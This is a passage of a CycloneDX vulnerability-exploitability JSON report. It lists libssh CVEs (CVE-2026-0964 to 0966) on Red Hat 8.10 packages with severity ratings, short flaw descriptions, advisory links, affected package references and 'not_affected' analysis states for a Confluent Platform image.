          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0964",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        22
      ],
      "description": "A malicious SCP server can send unexpected paths that could make the\nclient application override local files outside of working directory.\nThis could be misused to create malicious executable or configuration\nfiles and make the user execute them under specific consequences.\n\nThis is the same issue as in OpenSSH, tracked as CVE-2019-6111.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0964"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0964"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-18160.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-0964.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0964"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0964"
        },
        {
          "url": "https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2026-0964.txt"
        }
      ],
      "published": "2026-03-26T21:17:00+00:00",
      "updated": "2026-06-17T10:11:41+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0965",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        73
      ],
      "description": "A flaw was found in libssh where it can attempt to open arbitrary files during configuration parsing. A local attacker can exploit this by providing a malicious configuration file or when the system is misconfigured. This vulnerability could lead to a Denial of Service (DoS) by causing the system to try and access dangerous files, such as block devices or large system files, which can disrupt normal operations.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0965"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0965"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-18160.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-0965.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0965"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0965"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2026-0965.txt"
        }
      ],
      "published": "2026-03-26T21:17:00+00:00",
      "updated": "2026-06-17T10:11:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0966",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        124
      ],
      "description": "A flaw was found in libssh. The API function `ssh_get_hexa()` is vulnerable to a denial of service when processing zero-length input. This can be exploited remotely by an attacker during GSSAPI (Generic Security Service Application Program Interface) authentication if the server's logging verbosity is set to `SSH_LOG_PACKET (3)` or higher. Successful exploitation could lead to a self-Denial of Service of the per-connection daemon process.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0966"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7067"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0966"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
